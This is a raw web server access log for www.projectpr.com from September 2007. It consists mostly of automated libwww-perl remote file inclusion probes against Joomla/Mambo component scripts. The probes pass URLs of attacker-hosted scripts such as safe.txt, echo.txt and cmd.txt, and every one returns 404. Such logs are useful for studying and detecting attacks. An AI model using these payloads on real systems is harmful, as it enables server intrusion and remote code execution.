219.84.134.33 - - [13/Sep/2007:12:24:01 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:12:24:03 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
219.84.134.33 - - [13/Sep/2007:12:24:03 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://zmetea.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:12:47:05 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 289 "-" "libwww-perl/5.805" "www.projectpr.com"
205.234.135.19 - - [13/Sep/2007:12:49:55 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
199.237.227.253 - - [13/Sep/2007:12:58:52 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 295 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.227.253 - - [13/Sep/2007:12:58:53 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.227.253 - - [13/Sep/2007:12:58:53 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
205.234.135.19 - - [13/Sep/2007:13:04:58 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.135.19 - - [13/Sep/2007:13:04:58 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.isslimited.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
63.162.64.106 - - [13/Sep/2007:13:22:28 -0700] "GET /logs/access.log//login.php?dir=http://ox1de.altervista.org/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
63.162.64.106 - - [13/Sep/2007:13:22:28 -0700] "GET //login.php?dir=http://ox1de.altervista.org/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
63.162.64.106 - - [13/Sep/2007:13:22:29 -0700] "GET /logs//login.php?dir=http://ox1de.altervista.org/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.44.57.72 - - [13/Sep/2007:13:30:03 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)/Nutch-1.0-dev" "www.projectpr.com"
72.44.57.72 - - [13/Sep/2007:13:30:03 -0700] "GET / HTTP/1.0" 200 10036 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty)/Nutch-1.0-dev" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:13:33:03 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 305 "-" "libwww-perl/5.805" "www.projectpr.com"
203.32.125.78 - - [13/Sep/2007:13:33:03 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=www.infostec.hpg.com.br/spread.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.170.248.194 - - [13/Sep/2007:13:34:40 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.projectpr.com"
199.237.227.253 - - [13/Sep/2007:13:40:19 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 279 "-" "libwww-perl/5.53" "www.projectpr.com"
87.106.82.107 - - [13/Sep/2007:14:08:36 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.82.107 - - [13/Sep/2007:14:09:11 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.82.107 - - [13/Sep/2007:14:09:12 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.56.208.143 - - [13/Sep/2007:14:19:24 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
81.56.208.143 - - [13/Sep/2007:14:19:25 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
81.56.208.143 - - [13/Sep/2007:14:19:25 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.3.192.124 - - [13/Sep/2007:14:55:41 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.spycorp-labs.com/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.3.192.124 - - [13/Sep/2007:14:55:41 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.spycorp-labs.com/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.3.192.124 - - [13/Sep/2007:14:55:41 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.spycorp-labs.com/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.3.192.124 - - [13/Sep/2007:14:55:59 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.spycorp-labs.com/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.3.192.124 - - [13/Sep/2007:14:55:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.spycorp-labs.com/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
195.3.192.124 - - [13/Sep/2007:14:56:00 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.spycorp-labs.com/echo.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
204.213.246.61 - - [13/Sep/2007:15:11:06 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.79" "www.projectpr.com"
204.213.246.61 - - [13/Sep/2007:15:11:07 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
204.213.246.61 - - [13/Sep/2007:15:11:07 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.spycorp-labs.com/echo.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.79" "www.projectpr.com"
193.226.105.79 - - [13/Sep/2007:15:23:21 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
193.226.105.79 - - [13/Sep/2007:15:23:21 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
81.56.208.143 - - [13/Sep/2007:15:29:00 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
81.56.208.143 - - [13/Sep/2007:15:29:00 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 273 "-" "libwww-perl/5.48" "www.projectpr.com"
81.56.208.143 - - [13/Sep/2007:15:29:01 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
64.40.103.168 - - [13/Sep/2007:15:53:58 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.79" "www.projectpr.com"
64.40.103.168 - - [13/Sep/2007:15:53:58 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.40.103.168 - - [13/Sep/2007:15:53:58 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
196.30.221.50 - - [13/Sep/2007:16:08:04 -0700] "GET /path.php?channel=http://hellinside.110mb.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
122.152.128.49 - - [13/Sep/2007:16:11:15 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.projectpr.com"
87.106.82.107 - - [13/Sep/2007:16:31:29 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.82.107 - - [13/Sep/2007:16:32:05 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
87.106.82.107 - - [13/Sep/2007:16:32:06 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://futurehousingsystems.com/images/control.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.803" "www.projectpr.com"
64.40.103.168 - - [13/Sep/2007:16:45:32 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.40.103.168 - - [13/Sep/2007:16:45:32 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.40.103.168 - - [13/Sep/2007:16:45:32 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.79" "www.projectpr.com"
80.84.247.233 - - [13/Sep/2007:16:54:02 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
64.40.103.168 - - [13/Sep/2007:16:57:16 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.40.103.168 - - [13/Sep/2007:16:57:16 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
64.40.103.168 - - [13/Sep/2007:16:57:16 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.79" "www.projectpr.com"
82.100.220.42 - - [13/Sep/2007:16:59:51 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:17:10:45 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:17:11:04 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:17:47:33 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:17:47:33 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:17:47:33 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:17:48:58 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:17:48:58 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:17:48:58 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:17:52:34 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:17:52:34 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:17:52:34 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:17:55:16 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:17:55:16 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:17:55:16 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.808" "www.projectpr.com"
206.225.86.181 - - [13/Sep/2007:18:01:49 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
82.100.220.42 - - [13/Sep/2007:18:04:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:06:37 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:06:37 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
80.84.247.233 - - [13/Sep/2007:18:07:10 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.84.247.233 - - [13/Sep/2007:18:07:11 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.84.247.233 - - [13/Sep/2007:18:07:11 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:07:21 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 285 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:07:21 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 280 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:07:21 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 306 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:07:21 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 301 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:07:27 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 306 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:07:27 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 301 "-" "libwww-perl/5.808" "www.projectpr.com"
88.131.153.91 - - [13/Sep/2007:18:08:44 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.projectpr.com"
88.131.153.91 - - [13/Sep/2007:18:08:58 -0700] "GET / HTTP/1.0" 200 10036 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.projectpr.com"
206.225.86.181 - - [13/Sep/2007:18:13:11 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.181 - - [13/Sep/2007:18:13:11 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 298 "-" "libwww-perl/5.64" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:16:18 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:16:18 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:16:19 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.232.3.202 - - [13/Sep/2007:18:16:19 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
81.56.208.143 - - [13/Sep/2007:18:17:00 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
81.56.208.143 - - [13/Sep/2007:18:17:01 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
81.56.208.143 - - [13/Sep/2007:18:17:01 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://71.102.93.10/WTS/bin/hak/idpitbull.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:18:21:59 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:18:21:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 290 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:18:21:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:18:22:09 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:18:22:09 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.120.237.150 - - [13/Sep/2007:18:22:09 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:18:27:58 -0700] "GET /logs/access.log/components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:18:27:58 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 289 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:18:27:58 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:18:28:03 -0700] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 306 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:18:28:04 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.205.196.4 - - [13/Sep/2007:18:28:04 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.canalhip-hop.kit.net/id.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.808" "www.projectpr.com"
195.200.91.130 - - [13/Sep/2007:18:33:41 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 293 "-" "libwww-perl/5.805" "www.projectpr.com"
206.225.86.181 - - [13/Sep/2007:18:42:02 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.181 - - [13/Sep/2007:18:42:02 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.64" "www.projectpr.com"
206.225.86.181 - - [13/Sep/2007:18:42:02 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.64" "www.projectpr.com"
64.79.200.25 - - [13/Sep/2007:18:50:35 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://hellinside.110mb.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
64.79.200.25 - - [13/Sep/2007:18:52:06 -0700] "GET /logs/access.log/admin.remository.php?mosConfig_absolute_path=http://hellinside.110mb.com/echo.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.808" "www.projectpr.com"
64.79.200.25 - - [13/Sep/2007:18:52:06 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://hellinside.110mb.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
213.22.58.245 - - [13/Sep/2007:18:53:14 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.22.58.245 - - [13/Sep/2007:18:55:37 -0700] "GET /logs/access.log/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 282 "-" "libwww-perl/5.805" "www.projectpr.com"
213.22.58.245 - - [13/Sep/2007:18:55:37 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
59.124.28.7 - - [13/Sep/2007:18:58:36 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://hellinside.110mb.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
195.200.91.130 - - [13/Sep/2007:18:59:59 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 309 "-" "libwww-perl/5.805" "www.projectpr.com"
195.200.91.130 - - [13/Sep/2007:18:59:59 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
59.124.28.7 - - [13/Sep/2007:19:02:37 -0700] "GET /logs/access.log/admin.remository.php?mosConfig_absolute_path=http://hellinside.110mb.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
59.124.28.7 - - [13/Sep/2007:19:02:38 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://hellinside.110mb.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
